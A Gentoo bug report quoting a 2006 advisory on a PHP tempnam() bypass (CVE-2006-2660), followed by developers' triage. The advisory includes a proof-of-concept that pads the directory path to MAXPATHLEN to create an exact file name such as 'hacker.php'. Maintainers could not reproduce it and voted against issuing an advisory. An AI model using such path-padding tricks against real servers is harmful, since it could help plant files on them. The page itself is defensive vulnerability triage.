Home | Docs | Forums | Lists | Bugs | Planet | Store | GMN | Get Gentoo!

Full Text Bug Listing

The CVE is under review, but it appears to be legitimate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() Bypass unique file name PHP 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.

A nice introduction to PHP by Stig S

The CVE is under review, but it appears to be legitimate.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() Bypass unique file name PHP 5.1.4]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 22.5.2006
- -Public: 11.6.2006
from SECURITYREASON.COM
CVE-2006-2660

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from
C, Java and Perl with a couple of unique PHP-specific features thrown in. The
goal of the language is to allow web developers to write dynamically generated
pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at
http://www.zend.com/zend/art/intro.php on the Zend website. Also, much of the
PHP Conference Material is freely available.
tempnam -- Create file with unique file name.

- --- 1. tempnam() Bypass unique file name ---
In lastes adv i have public an issue "Open Basedir Bypass". In function
tempname() are required 2 arg`s.

http://pl.php.net/manual/en/function.tempnam.php

string tempnam ( string dir, string prefix )

In PHP 5.1.4 exists bug that allows you to create file with any name.

- ---
cxib# php -r 'echo tempnam("/www/temp/", "hacker.php")."\n";'
/www/temp/hacker.phpGQMqSE 
- ---

You have created file /www/temp/hacker.phpGQMqSE. "GQMqSE" is automatically
added to filename.
Problem exists, because  path couldn't be longer than MAXPATHLEN. In standard
MAXPATHLEN is 1024B. 

- -771-805---
PHP_FUNCTION(tempnam)
{
        zval **arg1, **arg2;
        char *d;
        char *opened_path;
        char *p;
        int fd;
        size_t p_len;

        if (ZEND_NUM_ARGS() != 2 || zend_get_parameters_ex(2, &arg1, &arg2) ==
FAILURE) {
                WRONG_PARAM_COUNT;
        }
        convert_to_string_ex(arg1);
        convert_to_string_ex(arg2);

        if (php_check_open_basedir(Z_STRVAL_PP(arg1) TSRMLS_CC)) {
                RETURN_FALSE;
        }

        d = estrndup(Z_STRVAL_PP(arg1), Z_STRLEN_PP(arg1));

        php_basename(Z_STRVAL_PP(arg2), Z_STRLEN_PP(arg2), NULL, 0, &p, &p_len
TSRMLS_CC);
        if (p_len > 64) {
                p[63] = '\0';
        }

        if ((fd = php_open_temporary_fd(d, p, &opened_path TSRMLS_CC)) >= 0) {
                close(fd);
                RETVAL_STRING(opened_path, 0);
        } else {
                RETVAL_FALSE;
        }
        efree(p);
        efree(d);
}
- -771-805---

So if you create path like /www/../www/.. etc. 

arg1+arg2=1023

uniqueid is not given to path. 

Example:

- ---
cxib# php -r 'echo
tempnam("/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
 www/../www/../www/../www/../www/../www/../www/temp/", "hacker.php")."\n";'
/www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../dupa/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../www/../
 www/../www/../www/temp/hacker.php
- ---

= /www/temp/hacker.php

- ---
cxib# ls -la /www/temp/hacker*
- -rw-------  1 cxib  cxib  0 May 22 23:33 /www/temp/hacker.php
- -rw-------  1 cxib  cxib  0 May 22 23:26 /www/temp/hacker.phpGQMqSE
- ---


- --- 2. How to fix ---
CVS
http://cvs.php.net/viewcvs.cgi/php-src/NEWS

- --- 3. Greets ---

For: sp3x
and
p_e_a, l3x, pi3, eax, Infospec ;]

- --- 4. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (FreeBSD)

iD8DBQFEjGMW3Ke13X/fTO4RAl50AKCH7H7pDtfjTLcZ02+izd3P25fkvACfS7tK
tTnC41pJ3aQEAEvt580AqI0=
=ZfrH
-----END PGP SIGNATURE-----

Tried the PoC on php-4.4.2-pl2, and it does not appear to work there, at least.
 I do not have access to 5.1.4 at the moment.

Tried the PoC on a freshly installed 5.1.4.  The cut-off point appears to be
4096, not 1024 (for me anyway).

As soon as the path goes over 4095 bytes, the temp file gets changed to
'/tmp/<filename><random>'.

So, I'm not sure under what conditions this is supposed to work.

I'll let someone else with more authority switch to INVALID, if that is the
case, however.

stepp: Isnt' that the point? Bloat the filename and get a file handle you can
control?

No, perhaps I was unclear.  The filename is still not controllable.

For example:
tempnam("/www/..< pad to 4095 total >/www/temp/","hacker123.php");

results in /www/temp/hacker123.php3I2fgH or something similar

tempnam("/www/..< pad to 4096 total >/www/temp/","hacker1234.php");

results in /tmp/hacker1234.php3I2fgH or something similar.

The random string at the end is still there.

Add PHP Team to CC.
Best regards, CHTEKK.

stepp: I must be stupid here, but that's how tempnam() is supposed to work.
Isn't the whole idea of the exploit to pad the directory with bloat until you
reach MAXPATHLEN-strlen(wantedfile), which would give you a controllable file
handle? At least that's what I see the exploit claims to do.

Ah, I got confused, obviously. So on your system the functions falls back like
in the case when the directory doesn't exist? I'll try to confirm this here.

I just tried with 5.1.4 (x86) from portage and get the same result as Nigel
does (the function falls back to /tmp, and the random tail is still intact), so
I'd count it as INVALID.

i had already checked this issue before, i had chosen to not fill a bug. I
would close it as "invalid" too.

What do we do here? Close or not? I can't reproduce it too here on all my
systems, so closing it invalid seems right.
Best regards, CHTEKK.

I could neither and so I'd also suggest invalidating this one, unless anybody
steps up to say it worked for him/her.

Fixed in dev-lang/php-4.4.2-r6 and dev-lang/php-5.1.4-r4. Upstream provided an
explicit patch for this (so they were able to reproduce it somehow), and it was
added to those releases.
Stabling of those two PHP versions can be handled in bug 133524.
Best regards, CHTEKK.

Seems like it is time for GLSA decision on this one as well.

invalid, IMHO, not reproducable on x86 at least. Other arches? Else I vote
"no".

Voting no, this bug is stupid. You don't give control to the untrusted party to
the path in tempnam, doesn't work, and impact is lame.

yet another "no" and closing...